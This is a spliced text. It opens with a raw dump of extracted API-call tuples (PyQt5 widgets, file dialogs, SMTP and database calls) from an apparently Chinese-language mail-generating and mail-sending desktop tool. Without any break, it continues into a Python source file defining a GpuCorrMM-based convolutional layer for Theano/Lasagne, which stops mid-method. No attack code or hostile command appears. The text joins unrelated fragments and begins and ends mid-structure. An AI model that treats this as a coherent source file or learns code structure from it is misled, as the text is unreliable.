QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6830, 6841), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6839, 6841), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6870, 6881), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6879, 6881), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6969, 6986), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (6980, 6986), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7124, 7135), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7133, 7135), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7171, 7182), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7180, 7182), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7212, 7226), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""是"""'], {}), "('是')\n", (7221, 7226), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7256, 7267), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7265, 7267), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7298, 7315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", 
(7309, 7315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7436, 7447), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7445, 7447), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7473, 7485), 'PyQt5.QtWidgets.QTabWidget', 'QTabWidget', ([], {}), '()\n', (7483, 7485), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7618, 7627), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7625, 7627), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7654, 7663), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7661, 7663), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7793, 7806), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (7804, 7806), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7836, 7849), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (7847, 7849), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8065, 8076), 'PyQt5.QtWidgets.QTextEdit', 'QTextEdit', ([], {}), '()\n', (8074, 8076), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8104, 8120), 'PyQt5.QtWebEngineWidgets.QWebEngineView', 'QWebEngineView', ([], {}), '()\n', (8118, 8120), False, 'from PyQt5.QtWebEngineWidgets import QWebEngineView\n'), ((8275, 8292), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""清除"""'], {}), "('清除')\n", (8286, 8292), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8390, 8407), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""讀取"""'], {}), "('讀取')\n", (8401, 8407), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8503, 
8520), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (8514, 8520), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8629, 8643), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ([], {}), '()\n', (8641, 8643), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8732, 8743), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (8741, 8743), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8772, 8783), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (8781, 8783), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8868, 8885), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""執行"""'], {}), "('執行')\n", (8879, 8885), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15450, 15518), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Eml Files (*.eml)"""'], {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')\n", (15477, 15518), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15605, 15676), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Excel Files (*.xlsx)"""'], {}), "(self, '選取檔案', './', 'Excel Files (*.xlsx)')\n", (15632, 15676), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15762, 15838), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Word Files (*.doc *.docx)"""'], {}), "(self, '選取檔案', './', 'Word Files (*.doc *.docx)')\n", (15789, 15838), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15925, 16011), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Annex Files (*.jpg *.png *.zip)"""'], {}), "(self, '選取檔案', './',\n 'Annex Files (*.jpg *.png *.zip)')\n", (15952, 16011), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, 
QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18931, 18999), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Eml Files (*.eml)"""'], {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')\n", (18958, 18999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19081, 19102), 'mylibrary.genmail.get_msg', 'gm.get_msg', (['file_name'], {}), '(file_name)\n', (19091, 19102), True, 'import mylibrary.genmail as gm\n'), ((22664, 22687), 'PyQt5.QtWidgets.QApplication.instance', 'QApplication.instance', ([], {}), '()\n', (22685, 22687), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1069, 1103), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (1101, 1103), False, 'import qdarkstyle, sys\n'), ((1141, 1154), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""收件人"""'], {}), "('收件人')\n", (1147, 1154), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2107, 2141), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (2139, 2141), False, 'import qdarkstyle, sys\n'), ((5815, 5842), 'PyQt5.QtCore.QDateTime.currentDateTime', 'QDateTime.currentDateTime', ([], {}), '()\n', (5840, 5842), False, 'from PyQt5.QtCore import Qt, QDateTime\n'), ((11920, 11933), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (11926, 11933), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((12968, 12982), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""查詢 :"""'], {}), "('查詢 :')\n", (12974, 12982), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((13447, 13471), 'copy.deepcopy', 'deepcopy', (['self.data_logs'], {}), '(self.data_logs)\n', (13455, 13471), False, 'from copy import deepcopy\n'), ((15075, 15141), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (15098, 15141), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17899, 17969), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""請確認有無 SMTP 資料!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)\n", (17918, 17969), False, 
'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19891, 19963), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '"""另存為..."""', '"""./"""', '"""Excel Files (*.eml)"""'], {}), "(self, '另存為...', './', 'Excel Files (*.eml)')\n", (19918, 19963), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((20123, 20189), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (20146, 20189), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22463, 22528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""缺少資料"""', '"""請確認是否有資料可以下載"""', 'QMessageBox.Ok'], {}), "(self, '缺少資料', '請確認是否有資料可以下載', QMessageBox.Ok)\n", (22482, 22528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((9197, 9210), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (9203, 9210), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((10310, 10323), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (10316, 10323), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((11182, 11195), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (11188, 11195), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((13358, 13368), 'server.database.Database', 'Database', ([], {}), '()\n', (13366, 13368), False, 'from server.database import Database\n'), ((14464, 14528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""資料庫連結失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)\n", (14483, 14528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15172, 15233), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (15191, 15233), False, 'from 
PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((16755, 16763), 'server.client.Client', 'Client', ([], {}), '()\n', (16761, 16763), False, 'from server.client import Client\n'), ((16933, 17001), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""排程設定成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '排程設定成功!', QMessageBox.Ok)\n", (16956, 17001), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17326, 17426), 'GenAndSendMail.insert_send_mail', 'insert_send_mail', (['eml_type', 'eml_file', 'user_group', 'mail_excel', 'sm', 'db'], {'annex': 'annex_file', 'url': 'url'}), '(eml_type, eml_file, user_group, mail_excel, sm, db, annex=\n annex_file, url=url)\n', (17342, 17426), False, 'from GenAndSendMail import insert_send_mail\n'), ((17519, 17587), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""信件寄出成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n", (17542, 17587), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17616, 17679), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""信件寄出失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n", (17635, 17679), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18773, 18836), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""信件寄出失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n", (18792, 18836), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19762, 19798), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html', 'annex_file'], {}), '(header, html, annex_file)\n', (19772, 19798), True, 'import mylibrary.genmail as gm\n'), ((19838, 19862), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html'], {}), '(header, html)\n', (19848, 19862), True, 'import mylibrary.genmail as gm\n'), ((20036, 20064), 'email.generator.Generator', 'generator.Generator', (['outfile'], {}), '(outfile)\n', (20055, 20064), False, 'from email import generator\n'), ((20218, 20279), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (20237, 20279), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, 
QHeaderView\n'), ((22015, 22088), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '"""另存為..."""', '"""./"""', '"""Excel Files (*.xlsx)"""'], {}), "(self, '另存為...', './', 'Excel Files (*.xlsx)')\n", (22042, 22088), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22172, 22202), 'pandas.DataFrame', 'DataFrame', (['self.data_temp_logs'], {}), '(self.data_temp_logs)\n', (22181, 22202), False, 'from pandas import DataFrame\n'), ((22272, 22338), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (22295, 22338), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17150, 17156), 'server.sendmail.Smtp', 'Smtp', ([], {}), '()\n', (17154, 17156), False, 'from server.sendmail import Smtp\n'), ((17298, 17308), 'server.database.Database', 'Database', ([], {}), '()\n', (17306, 17308), False, 'from server.database import Database\n'), ((18503, 18589), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Warning!"""', "('信件寄出成功!\\nWaning: ' + error)", 'QMessageBox.Ok'], {}), "(self, 'Warning!', '信件寄出成功!\\nWaning: ' + error,\n QMessageBox.Ok)\n", (18522, 18589), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18626, 18694), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""信件寄出成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n", (18649, 18694), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((20429, 20440), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (20438, 20440), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22375, 22436), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (22394, 22436), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((14893, 14904), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (14902, 14904), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((14992, 
15003), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ([], {}), '()\n', (15001, 15003), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((21802, 21823), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\n', (21808, 21823), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n'), ((14354, 14375), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\n', (14360, 14375), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n')] |
"""
GpuCorrMM-based convolutional layers
"""
import numpy as np
import theano
import theano.tensor as T
from theano.sandbox.cuda.basic_ops import gpu_contiguous
from theano.sandbox.cuda.blas import GpuCorrMM
from .. import init
from .. import nonlinearities
from . import base
# base class for all layers that rely on GpuCorrMM directly
class MMLayer(base.Layer):
pass
class Conv2DMMLayer(MMLayer):
def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False,
W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None,
flip_filters=False):
super(Conv2DMMLayer, self).__init__(input_layer)
if nonlinearity is None:
self.nonlinearity = nonlinearities.identity
else:
self.nonlinearity = nonlinearity
self.num_filters = num_filters
self.filter_size = filter_size
self.strides = strides
self.untie_biases = untie_biases
self.flip_filters = flip_filters
if border_mode is not None and pad is not None:
raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.")
elif border_mode is None and pad is None:
# no option specified, default to valid mode
self.pad = (0, 0)
elif border_mode is not None:
if border_mode == 'valid':
self.pad = (0, 0)
elif border_mode == 'full':
                self.pad = (self.filter_size[0] - 1, self.filter_size[1] - 1)
elif border_mode == 'same':
# only works for odd filter size, but the even filter size case is probably not worth supporting.
self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2)
else:
raise RuntimeError("Unsupported border_mode for Conv2DMMLayer: %s" % border_mode)
else:
self.pad = pad
self.W = self.create_param(W, self.get_W_shape())
if b is None:
self.b = None
elif self.untie_biases:
output_shape = self.get_output_shape()
self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3]))
else:
self.b = self.create_param(b, (num_filters,))
self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad)
def get_W_shape(self):
num_input_channels = self.input_layer.get_output_shape()[1]
return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1])
def get_params(self):
return [self.W] + self.get_bias_params()
def get_bias_params(self):
